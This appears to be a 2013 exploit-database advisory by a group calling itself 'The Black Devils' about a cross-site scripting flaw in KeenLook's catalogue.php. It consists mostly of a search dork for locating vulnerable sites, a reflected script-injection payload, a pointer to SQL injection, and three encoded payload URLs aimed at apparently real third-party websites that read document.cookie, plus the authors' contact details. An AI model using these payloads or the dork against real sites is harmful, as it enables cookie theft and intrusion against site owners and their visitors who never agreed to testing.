# Exploit Title: KeenLook XSS Vulnerability
# Date: 26/02/2013
# Author: The Black Devils
# Software Link: http://www.keenlook.com/
# Category : [ webapps ]
# Dork : Powered By KeenLook inurl:catalogue.php?page=
# Type : php
# Tested on: [Windows] & [Ubuntu]
-------------------------------
http:\Localhost\[Path]\catalogue.php?page= '"><script>alert(1337);</script>'
http:\Localhost\[Path]\catalogue.php?page=[sql injection]
-------------------------------
# Demo site:
http://www.cordial-zulco.com/catalogue.php?cid=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%27
http://www.uniqueedge.org/catalogue.php?page=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%27
http://www.gimamedical.com/catalogue.php?pID=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%27
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information